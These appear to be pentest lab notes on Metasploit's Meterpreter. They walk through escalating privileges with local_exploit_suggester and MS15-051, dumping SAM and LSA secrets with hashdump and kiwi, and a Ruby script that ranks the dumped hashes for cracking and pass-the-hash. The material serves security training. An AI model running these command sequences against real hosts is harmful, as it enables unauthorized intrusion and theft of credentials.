Meterpreter

Put simply, Meterpreter is a multi-faceted, extensible payload. It runs entirely in the target's memory and gives us one channel through which to work on the compromised host: a shell, file transfer, screenshots, webcam capture and much more. It comes in both staged and stageless forms, so it can be fitted to whatever delivery method the exploit or the target allows.

It is more than a shell on the victim's machine, and it is comparatively stealthy: the Meterpreter DLL itself is never written to disk and no new process is spawned, because it is injected into the already compromised process and can later migrate into another one (typically a longer-lived or less conspicuous process). The channel back to Metasploit is AES-encrypted, so the traffic is not readable on the wire.


Attack structure

  • The target executes the initial stager. This is usually a bind or reverse stager (historically also findtag, passivex, etc.).

  • The stager loads the Meterpreter DLL (metsrv), which is built as a reflective DLL: the Reflective stub maps the DLL into memory itself, so it goes through neither the disk nor LoadLibrary.

  • The Meterpreter core initializes, establishes an AES-encrypted link over the socket and sends a GET. Metasploit receives this GET and configures the client.

  • Lastly, Meterpreter loads extensions. It always loads stdapi, and loads priv as well when the session has administrative rights. All of these extensions are loaded over the AES-encrypted channel.

Facts and considerations

From a real-life perspective, Meterpreter and Metasploit in general leave traces behind: a dropped stager binary that cannot be cleaned up, well-known payload signatures, default certificates and similar artifacts that AV/EDR products detect out of the box. On an engagement where stealth matters this is a liability and can ruin the pentest; sys admins and defenders are likely to notice, and we get caught.

Important enumeration module: post/multi/recon/local_exploit_suggester

The suggester runs against an existing session, so first background the Meterpreter session (or note its id from sessions -l) and point SESSION at it. The same goes for the local exploit it recommends.

msf6 exploit(...) > search local_exploit_suggester
msf6 exploit(...) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 34 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
msf6 exploit(windows/local/ms15_051_client_copy_image) > set ... (LHOST, LPORT and whatever else show options marks as required)
msf6 exploit(windows/local/ms15_051_client_copy_image) > run
meterpreter > getuid
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > lsa_dump_sam
meterpreter > lsa_dump_secrets

getuid confirms we are NT AUTHORITY\SYSTEM before dumping; hashdump is built into stdapi/priv, while lsa_dump_sam and lsa_dump_secrets come from the kiwi (Mimikatz) extension and need load kiwi first.

The Local Security Authority (LSA) in Windows manages authentication and enforces the local security policy. Its secrets (service-account passwords, the machine account password, cached domain logon verifiers and the like) live under HKLM\SECURITY, which only SYSTEM can read; that is why lsa_dump_secrets is only worth running once we have escalated. Adversaries also abuse LSA for persistence, by registering a malicious DLL as an authentication package in the registry so that it is loaded with SYSTEM privileges when LSA starts.

The Security Account Manager (SAM) stores the password hashes of the local accounts, i.e. the LM and NTLM hashes that hashdump and lsa_dump_sam print. The SAM hive is protected with a key derived from the SYSTEM hive's boot key, so reading it likewise requires SYSTEM privileges. Cached domain credentials are not in the SAM; they are an LSA secret in HKLM\SECURITY.

Exploit

Checking the website with default credentials, we get a version number:

Shell

Hash Dumping

hashdump prints one account per line in pwdump format, username:RID:LM hash:NTLM hash:::

  • 1st field: username

  • 2nd field: Relative Identifier (RID); 500 is the built-in Administrator, 501 is Guest, and RIDs from 1000 up are locally created accounts

  • 3rd field: LM hash; aad3b435b51404eeaad3b435b51404ee means no LM hash is stored, which is the default on modern Windows

  • 4th field: NTLM hash; 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of the empty password
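As an added example (my own code, not from the original page or from Metasploit), here is a small Ruby script that parses hashdump output in the format above and does the triage we would otherwise do by eye: accounts with a blank NT hash, accounts that still store an LM hash, local accounts sharing the same NT hash (password reuse, hence pass-the-hash candidates), the Administrator hash for pass-the-hash, and user:hash lines ready for hashcat. The sample dump is constructed; the non-empty LM/NT values are the well-known hashes of "password", the last NT hash is arbitrary, and the function names are mine.

```ruby
# Triage of Meterpreter `hashdump` output (pwdump format, one account per line):
#   username:RID:LM hash:NTLM hash:::
# Added example; not code from the page or from Metasploit.

# LM hash of an empty/disabled LM password, and NT hash of the empty string.
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'.freeze
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'.freeze

# Constructed sample dump (not from a real host). The non-empty LM/NT values are
# the well-known hashes of "password"; the last NT hash is arbitrary. The final
# line stands in for console noise that the parser has to skip.
SAMPLE_HASHDUMP = <<~'DUMP'
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  svc_backup:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
  HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:4d5a8b8c2f7a8a2f1f0b2a6f2e5c9d1e:::
  [*] this line is console noise and must be ignored
DUMP

HashEntry = Struct.new(:user, :rid, :lm, :nt) do
  # LM is disabled on modern Windows; a real LM hash means a weak, crackable password.
  def lm_stored?
    lm != EMPTY_LM
  end

  # NT hash of "" is a blank password (hashdump does not say whether the account is disabled).
  def blank_password?
    nt == EMPTY_NT
  end

  # RIDs below 1000 are well-known/built-in accounts (500 Administrator, 501 Guest, ...).
  def builtin?
    rid < 1000
  end
end

# One hashdump line: user, decimal RID, two 32-hex-digit hashes, trailing ":::".
HASH_LINE = /\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i

# Parse raw console output into HashEntry structs, skipping anything that is not a hash line.
def parse_hashdump(text)
  text.each_line.filter_map do |line|
    m = HASH_LINE.match(line.strip)
    m && HashEntry.new(m[1], m[2].to_i, m[3].downcase, m[4].downcase)
  end
end

# Findings a pentester wants straight away: blank passwords, surviving LM hashes,
# password reuse across local accounts (pass-the-hash pivots), the Administrator
# NT hash for pass-the-hash, and user:hash input for hashcat.
def triage(entries)
  by_nt = entries.group_by(&:nt)
  {
    blank_password: entries.select(&:blank_password?).map(&:user),
    lm_present:     entries.select(&:lm_stored?).map(&:user),
    shared_nt:      by_nt.values.select { |g| g.size > 1 }.map { |g| g.map(&:user) },
    pth_admin:      entries.find { |e| e.rid == 500 && !e.blank_password? }&.nt,
    hashcat_nt:     entries.reject(&:blank_password?).map { |e| "#{e.user}:#{e.nt}" },
  }
end

if __FILE__ == $PROGRAM_NAME
  triage(parse_hashdump(SAMPLE_HASHDUMP)).each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

Feed the hashcat_nt lines to hashcat -m 1000 --username (and any LM hashes to -m 3000); treat shared_nt as the first pass-the-hash targets. A blank NT hash on Guest is normal and usually useless because the account is disabled, so check account status before celebrating.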

If local_exploit_suggester turns up nothing usable, a classic fallback on older 32-bit Windows targets is KiTrap0D (MS10-015), found in

exploit/windows/local/ms10_015_kitrap0d
